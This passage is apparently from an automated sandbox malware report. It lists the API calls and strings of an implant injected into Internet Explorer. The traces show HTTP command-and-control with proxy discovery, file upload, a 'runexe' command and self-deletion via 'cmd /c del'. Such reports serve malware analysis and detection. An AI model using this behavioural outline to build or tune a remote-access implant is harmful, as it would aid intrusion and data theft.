      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
      • Part of subcall function 004F3197: _errno.MSVCRT ref: 004F31A4
      • Part of subcall function 004F3197: _wcslwr.MSVCRT ref: 004F31D6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00514AAC, Relevance: 9.1, APIs: 6, Instructions: 83
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00514AC6
    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AD6
    • ??3@YAXPAX@Z.MSVCRT ref: 00514AE1
    • ??2@YAPAXI@Z.MSVCRT ref: 00514AE9
    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AFA
    • ??3@YAXPAX@Z.MSVCRT ref: 00514B71
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F278F, Relevance: 2.5, Strings: 2, Instructions: 23
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00519958, Relevance: .7, Instructions: 696
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005186ED, Relevance: .6, Instructions: 605
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00519591, Relevance: .2, Instructions: 200
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00519361, Relevance: .2, Instructions: 177
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00518EF8, Relevance: .1, Instructions: 84
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00512CCF, Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 329
    APIs
    • memset.MSVCRT ref: 00512D12
      • Part of subcall function 005190CF: ??2@YAPAXI@Z.MSVCRT ref: 0051910D
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 0051911A
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519127
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519141
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 00519159
      • Part of subcall function 005190CF: ??3@YAXPAX@Z.MSVCRT ref: 005191AD
    • ??3@YAXPAX@Z.MSVCRT ref: 005130DB
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    • memset.MSVCRT ref: 00512D77
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • memset.MSVCRT ref: 00512DA7
    • ??2@YAPAXI@Z.MSVCRT ref: 00512DEA
    • ??2@YAPAXI@Z.MSVCRT ref: 00512E1B
    • ??2@YAPAXI@Z.MSVCRT ref: 00512E4C
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F06
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F12
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F1E
    • ??2@YAPAXI@Z.MSVCRT ref: 00512F33
    • ??2@YAPAXI@Z.MSVCRT ref: 00512F4C
    • rand.MSVCRT ref: 00512F5A
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
    • __swprintf_c_l.LIBCMT ref: 00512F7B
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051AA2A: _errno.MSVCRT ref: 0051AA58
      • Part of subcall function 0051AA2A: _errno.MSVCRT ref: 0051AB07
    • ??3@YAXPAX@Z.MSVCRT ref: 00512FB1
    • rand.MSVCRT ref: 00512FBB
    • __swprintf_c_l.LIBCMT ref: 00512FD7
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • ??3@YAXPAX@Z.MSVCRT ref: 0051300D
    • rand.MSVCRT ref: 00513017
    • __swprintf_c_l.LIBCMT ref: 00513033
    • ??3@YAXPAX@Z.MSVCRT ref: 00513065
    • ??3@YAXPAX@Z.MSVCRT ref: 0051307D
    • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000002,A0000000), ref: 005130BB
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 005130C5
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005123CA, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 275
    APIs
    • memset.MSVCRT ref: 00512458
    • rand.MSVCRT ref: 0051246D
    • rand.MSVCRT ref: 0051249B
    • rand.MSVCRT ref: 005124BF
    • rand.MSVCRT ref: 005124DB
    • rand.MSVCRT ref: 00512505
    • rand.MSVCRT ref: 0051253C
    • rand.MSVCRT ref: 0051257E
    • rand.MSVCRT ref: 005125B5
    • ___swprintf_l.LIBCMT ref: 005125E9
    • memset.MSVCRT ref: 0051263B
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • rand.MSVCRT ref: 00512650
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • rand.MSVCRT ref: 0051267F
    • rand.MSVCRT ref: 005126A4
    • ___swprintf_l.LIBCMT ref: 005126CA
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516239, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 121stringthread
    APIs
    • GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00516269
    • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00516280
    • GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000104), ref: 00516298
    • wcsstr.MSVCRT ref: 005162B3
    • memset.MSVCRT ref: 005162D4
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 005162E7
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00516309
    • lstrcpyW.KERNEL32(?,/c del ), ref: 0051631B
    • lstrcatW.KERNEL32(?,?), ref: 00516335
    • lstrcatW.KERNEL32(?, > nul), ref: 00516343
    • ShellExecuteExW.SHELL32(?), ref: 00516375
    • SetPriorityClass.KERNEL32(?,00000040), ref: 00516389
    • GetCurrentProcess.KERNEL32(00000100), ref: 00516390
    • SetPriorityClass.KERNEL32(00000000), ref: 00516397
    • GetCurrentThread.KERNEL32(0000000F), ref: 0051639B
    • SetThreadPriority.KERNEL32(00000000), ref: 005163A2
    • SHChangeNotify.SHELL32(00000004,00000005,?,00000000), ref: 005163B4
    • ExitProcess.KERNEL32 ref: 005163BB
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005159AF, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 178file
    APIs
    • memset.MSVCRT ref: 005159E7
    • ??2@YAPAXI@Z.MSVCRT ref: 00515A3A
    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00515A60
    • GetLastError.KERNEL32 ref: 00515A71
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00515A93
    • GetLastError.KERNEL32 ref: 00515AA4
    • memset.MSVCRT ref: 00515AB6
    • memcpy.MSVCRT ref: 00515AD1
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • GetLastError.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B02
    • GetTickCount.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B12
    • srand.MSVCRT ref: 00515B19
    • memset.MSVCRT ref: 00515B23
    • rand.MSVCRT ref: 00515B32
    • ReadFile.KERNEL32(?,0000000C,0000C60B,00000000,00000000), ref: 00515B5B
    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00515BBC
    • GetLastError.KERNEL32(00000000,-0000000C,000003F1,?), ref: 00515BE7
    • GetLastError.KERNEL32 ref: 00515B65
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00515C47: memset.MSVCRT ref: 00515C4B
      • Part of subcall function 00515C47: memcpy.MSVCRT ref: 00515C72
      • Part of subcall function 00515C47: GetLastError.KERNEL32(00000000,?,000003F2,?), ref: 00515CC0
    • ??3@YAXPAX@Z.MSVCRT ref: 00515C28
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    Strings
    • Read Upload File Size Error! - %d, xrefs: 00515AAB
    • Send OP_UPLOAD_DATA Data Failed!, xrefs: 00515BED
    • open upload file error! - %d, xrefs: 00515A78
    • Read Upload File Error! - %d, xrefs: 00515B74
    • Send OP_UPLOAD_START Data Failed!, xrefs: 00515B08
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511901, Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 217
    APIs
    • memset.MSVCRT ref: 00511936
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000032,?,?,00000000), ref: 0051196F
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000019), ref: 00511984
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000001E), ref: 00511999
    • wcsstr.MSVCRT ref: 005119B5
    • wcsstr.MSVCRT ref: 005119CB
    • ___swprintf_l.LIBCMT ref: 005119E6
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,?,?,00000000), ref: 00511A18
    • WinHttpSetOption.WINHTTP(?,00001002,?,?,?,?,?,?,00000000), ref: 00511A81
    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00511A87
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpSetOption.WINHTTP(?,00001003,?,?,?,?,?,00000000), ref: 00511AC7
    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00511ACD
    • WinHttpSetOption.WINHTTP(?,00001002,?,?,?,?,?,00000000), ref: 00511B02
    • WinHttpSetOption.WINHTTP(?,00001003,?,?,?,?,?,00000000), ref: 00511B2F
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511DA2, Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 224
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00511DDE
    • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?), ref: 00511E18
    • memset.MSVCRT ref: 00511E87
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020), ref: 00511E9C
    • WinHttpGetProxyForUrl.WINHTTP(?,?,00000002,?), ref: 00511EB3
    • WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C), ref: 00511ED4
    • WinHttpCloseHandle.WINHTTP(?), ref: 00511EE8
    • ___swprintf_l.LIBCMT ref: 00511F39
      • Part of subcall function 0051AB18: _errno.MSVCRT ref: 0051AB45
      • Part of subcall function 0051AB18: _errno.MSVCRT ref: 0051ABDA
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    • GlobalFree.KERNEL32(?), ref: 00511F93
    • GlobalFree.KERNEL32(?), ref: 00511FA1
    • WinHttpOpen.WINHTTP(00000000,00000003,?,?,00000000), ref: 00511FAF
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 00511FE0
    • GetLastError.KERNEL32 ref: 00511FEC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051129D, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 191registry
    APIs
    • memset.MSVCRT ref: 00511301
      • Part of subcall function 00511124: memset.MSVCRT ref: 0051115A
      • Part of subcall function 00511124: RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
      • Part of subcall function 00511124: wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
      • Part of subcall function 00511124: wcsstr.MSVCRT ref: 005111B1
      • Part of subcall function 00511124: memset.MSVCRT ref: 005111CF
      • Part of subcall function 00511124: RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
    • RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
    • RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
    • RegCloseKey.ADVAPI32(?), ref: 00511378
    • ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 00519317: _errno.MSVCRT ref: 00519324
      • Part of subcall function 00519317: _wcslwr.MSVCRT ref: 00519356
    • wcsstr.MSVCRT ref: 005113B9
    • wcsstr.MSVCRT ref: 005113D3
    • wcsstr.MSVCRT ref: 005113EE
    • memset.MSVCRT ref: 00511412
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • ___swprintf_l.LIBCMT ref: 005114C2
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00515258, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196string
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00515288
    • memset.MSVCRT ref: 00515295
    • ??2@YAPAXI@Z.MSVCRT ref: 005152A2
    • memset.MSVCRT ref: 005152B5
    • memcpy.MSVCRT ref: 005152C5
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    • ??2@YAPAXI@Z.MSVCRT ref: 005152DE
    • memset.MSVCRT ref: 005152ED
    • strstr.MSVCRT ref: 0051532E
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 00515486: memset.MSVCRT ref: 005154C7
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 005154DA
      • Part of subcall function 00515486: strncmp.MSVCRT(?,runexe ,00000007,?,?,[%s],?,?,00000000,000001FF), ref: 005154E7
